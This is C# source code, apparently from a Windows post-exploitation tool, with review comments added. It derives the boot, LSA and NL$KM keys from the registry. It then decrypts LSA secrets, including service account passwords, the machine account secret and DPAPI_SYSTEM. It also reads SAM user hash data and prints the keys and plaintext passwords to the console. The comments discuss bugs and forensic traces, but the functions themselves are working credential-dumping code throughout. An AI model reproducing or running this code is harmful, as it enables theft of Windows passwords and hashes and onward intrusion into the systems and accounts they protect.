        ////////////////////////////////////////////////////////////////////////////////
        //
        ////////////////////////////////////////////////////////////////////////////////
        /// <summary>
        /// Reads the configured cached-logon count, derives the boot key, the LSA key and the NL$KM
        /// key in turn, and passes the NL$KM key to <c>GetCache</c>. Each derived key is written to
        /// the console as upper-case hex, so key material ends up in whatever captures stdout.
        /// </summary>
        /// <remarks>
        /// Observable traces of this routine are the registry reads (Winlogon value plus whatever
        /// <c>LSASecrets.GetBootKey</c>/<c>GetLsaKey</c>/<c>GetNlkm</c> read) and the plaintext key
        /// output; the privilege needed for the underlying reads is not visible here - presumably
        /// SYSTEM, confirm against the helpers.
        /// </remarks>
        internal CacheDump()
        {
            // CachedLogonsCount is cast straight to String; assumes Reg.ReadRegKey returns the REG_SZ
            // as a String and never null - TODO confirm against Reg.ReadRegKey.
            String logonCount = (String)Reg.ReadRegKey(Reg.HKEY_LOCAL_MACHINE, @"Software\Microsoft\Windows NT\CurrentVersion\Winlogon", "CachedLogonsCount");

            Console.WriteLine("[*] {0} Cached Logons Set", logonCount);

            Byte[] bootKey = LSASecrets.GetBootKey();
            Console.WriteLine("[+] BootKey : " + BitConverter.ToString(bootKey).Replace("-", ""));
            Byte[] lsaKey = LSASecrets.GetLsaKey(bootKey);
            Console.WriteLine("[+] LSA Key : " + BitConverter.ToString(lsaKey).Replace("-", ""));
            Byte[] nlkm = GetNlkm(lsaKey);
            // NOTE(review): this prints the NL$KM key but reuses the "LSA Key" label from the line above.
            Console.WriteLine("[+] LSA Key : " + BitConverter.ToString(nlkm).Replace("-", ""));
            GetCache(nlkm);
        }
        ////////////////////////////////////////////////////////////////////////////////
        //
        ////////////////////////////////////////////////////////////////////////////////
        /// <summary>
        /// Enumerates the subkeys of <c>SECURITY\Policy\Secrets</c>, derives the boot and LSA keys,
        /// decrypts each secret's <c>CurrVal</c> with <c>DecryptLsa</c> and prints one
        /// service/user/password line per secret to the console in plaintext.
        /// </summary>
        /// <remarks>
        /// Failure handling is minimal: an unopenable Secrets key is a <see cref="NullReferenceException"/>
        /// (no null check on <c>OpenSubKey</c>), and secret names shorter than four characters throw
        /// from <c>Substring(0, 4)</c>. Nothing is logged other than to stdout.
        /// </remarks>
        internal void DumpLSASecrets()
        {
            Console.WriteLine("[*] Reading Secrets Key: SECURITY\\Policy\\Secrets");
            // OpenSubKey returns null when the key cannot be opened; GetSubKeyNames would then throw
            // NullReferenceException rather than reaching the "failed" branch below.
            String[] secretSubKeys = Registry.LocalMachine.OpenSubKey(@"SECURITY\Policy\Secrets").GetSubKeyNames();
            if (secretSubKeys.Length <= 0)
            {
                Console.WriteLine("[-] [-] Reading Secrets key failed");
                return;
            }

            // Both derived keys are echoed to the console as hex before any secret is decrypted.
            Byte[] bootKey = GetBootKey();
            Console.WriteLine("[+] BootKey : " + BitConverter.ToString(bootKey).Replace("-", ""));
            Byte[] lsaKey = GetLsaKey(bootKey);
            Console.WriteLine("[+] LSA Key : " + BitConverter.ToString(lsaKey).Replace("-", ""));

            foreach (String secret in secretSubKeys)
            {
                // Default (unnamed) value of <secret>\CurrVal holds the encrypted blob; cast assumes
                // Reg.ReadRegKey returns REG_BINARY data as Byte[] - TODO confirm.
                Byte[] managedArray    = (Byte[])Reg.ReadRegKey(Reg.HKEY_LOCAL_MACHINE, @"SECURITY\Policy\Secrets\" + secret + "\\CurrVal", "");
                Byte[] decryptedSecret = DecryptLsa(managedArray, lsaKey);

                String serviceName = "";
                String userName    = "";
                String password    = "";
                if (secret == "$MACHINE.ACC" || secret == "NL$KM" || secret == "DPAPI_SYSTEM")
                {
                    // Binary secrets: hex-dump the bytes starting at offset 16, taking as many bytes as the
                    // value of decryptedSecret[0]. Whether byte 0 really is the length is not checked here.
                    serviceName = secret;
                    password    = BitConverter.ToString(decryptedSecret.Skip(16).Take((Int32)decryptedSecret[0]).ToArray());
                }
                // Substring(0, 4) throws ArgumentOutOfRangeException for names shorter than 4 characters.
                else if (secret.Substring(0, 4) == "_SC_")
                {
                    // Service account secret: the run-as account comes from the service's ObjectName value.
                    serviceName = secret.Substring(4, secret.Length - 4);
                    userName    = (String)Reg.ReadRegKey(Reg.HKEY_LOCAL_MACHINE, @"SYSTEM\CurrentControlSet\Services\" + serviceName, "ObjectName");
                    password    = ParseDecrypted(decryptedSecret);
                }
                else
                {
                    serviceName = secret;
                    password    = ParseDecrypted(decryptedSecret);
                }
                // The format string ends in "\n" and WriteLine appends another, so entries are blank-line separated.
                String result = String.Format("{0,-30} {1,-20} {2,-20}\n", serviceName, userName, password);
                Console.WriteLine(result);
            }
        }
        ////////////////////////////////////////////////////////////////////////////////
        //
        ////////////////////////////////////////////////////////////////////////////////
        /// <summary>
        /// Builds a RID-to-username map from <c>SAM\SAM\Domains\Account\Users\Names</c>, then reads the
        /// F, V and UserPasswordHint values of every per-RID subkey under <c>...\Account\Users</c> into a
        /// <c>UserKeys</c> array.
        /// </summary>
        /// <param name="hBootKey">Boot key; accepted but not used anywhere in this method.</param>
        /// <returns>
        /// One <c>UserKeys</c> per RID subkey, or <c>null</c> if any Names subkey could not be opened or
        /// queried. Callers must handle the null.
        /// </returns>
        /// <remarks>
        /// Known fragilities visible here: the registry handle opened per iteration is never closed
        /// (no <c>RegCloseKey</c> in this method); the result array is sized
        /// <c>secretSubKeys.Length - 1</c> but indexed by the loop index, which only works when
        /// "Names" is the last subkey returned; and a RID missing from the Names map throws
        /// <see cref="KeyNotFoundException"/>.
        /// </remarks>
        internal UserKeys[] GetUserHashes(Byte[] hBootKey)
        {
            int     size = 0;
            UIntPtr hKey = new UIntPtr();
            Int32   type = 0;
            Dictionary <Int32, String> ridMapping = new Dictionary <Int32, String>();

            // OpenSubKey returns null when the key cannot be opened; no null check before GetSubKeyNames.
            String[] namesSubKeys = Registry.LocalMachine.OpenSubKey(@"SAM\SAM\Domains\Account\Users\Names").GetSubKeyNames();
            foreach (String name in namesSubKeys)
            {
                // hKey is overwritten on each iteration and never released - handle leak per user name.
                if (advapi32.RegOpenKeyEx(Reg.HKEY_LOCAL_MACHINE, @"SAM\SAM\Domains\Account\Users\Names\" + name, 0, Reg.KEY_QUERY_VALUE, out hKey) != 0)
                {
                    Console.WriteLine("[-] Error opening key '{0}\\{1}", @"SAM\SAM\Domains\Account\Users\Names\" + name, "");
                    return(null);
                }
                // Queried with a null data buffer, so only 'type' and 'size' are populated; the value's
                // type field is what gets used as the RID key below.
                if (advapi32.RegQueryValueEx(hKey, "", 0, ref type, IntPtr.Zero, ref size) != 0)
                {
                    Console.WriteLine("[-] [-] Error querying value '{0}\\{1}", @"SAM\SAM\Domains\Account\Users\Names\" + name, "");
                    return(null);
                }
                ridMapping[type] = name;
            }

            String[]   secretSubKeys = Registry.LocalMachine.OpenSubKey(@"SAM\SAM\Domains\Account\Users").GetSubKeyNames();
            // Length - 1 leaves room for every subkey except "Names", but the loop below writes at
            // index i, so the layout is only correct if "Names" happens to be the final entry.
            UserKeys[] userKeys      = new UserKeys[secretSubKeys.Length - 1];
            for (Int32 i = 0; i < secretSubKeys.Length; i++)
            {
                if (secretSubKeys[i] != "Names")
                {
                    // Elements are assigned in place without construction, so UserKeys is presumably a
                    // struct - confirm against its declaration.
                    userKeys[i].rid              = Int32.Parse(secretSubKeys[i], System.Globalization.NumberStyles.HexNumber);
                    // Throws KeyNotFoundException if this RID was not seen under Names.
                    userKeys[i].userName         = ridMapping[userKeys[i].rid];
                    userKeys[i].f                = (Byte[])Reg.ReadRegKey(Reg.HKEY_LOCAL_MACHINE, @"SAM\SAM\Domains\Account\Users\" + secretSubKeys[i], "F");
                    userKeys[i].v                = (Byte[])Reg.ReadRegKey(Reg.HKEY_LOCAL_MACHINE, @"SAM\SAM\Domains\Account\Users\" + secretSubKeys[i], "V");
                    // GetValue returns null when the value is absent; the cast then stores null.
                    userKeys[i].userPasswordHint = (Byte[])Registry.LocalMachine.OpenSubKey(@"SAM\SAM\Domains\Account\Users\" + secretSubKeys[i]).GetValue("UserPasswordHint");
                    //userKeys[i].userPasswordHint = (Byte[])Reg.ReadRegKey(Reg.HKEY_LOCAL_MACHINE, @"SAM\SAM\Domains\Account\Users\" + secretSubKeys[i], "UserPasswordHint");
                }
            }
            return(userKeys);
        }
 ////////////////////////////////////////////////////////////////////////////////
 //
 ////////////////////////////////////////////////////////////////////////////////
 /// <summary>
 /// Reads the encrypted NL$KM secret (default value of <c>SECURITY\Policy\Secrets\NL$KM\CurrVal</c>)
 /// and decrypts it with the supplied LSA key via <c>LSASecrets.DecryptLsa</c>.
 /// </summary>
 /// <param name="lsaKey">LSA key passed through to <c>LSASecrets.DecryptLsa</c>.</param>
 /// <returns>Whatever <c>LSASecrets.DecryptLsa</c> returns for the NL$KM blob.</returns>
 private static Byte[] GetNlkm(Byte[] lsaKey)
 {
     const String nlkmPath = @"SECURITY\Policy\Secrets\NL$KM\CurrVal";
     // Cast assumes Reg.ReadRegKey hands back the REG_BINARY value as a Byte[] - TODO confirm.
     var encrypted = (Byte[])Reg.ReadRegKey(Reg.HKEY_LOCAL_MACHINE, nlkmPath, "");
     return LSASecrets.DecryptLsa(encrypted, lsaKey);
 }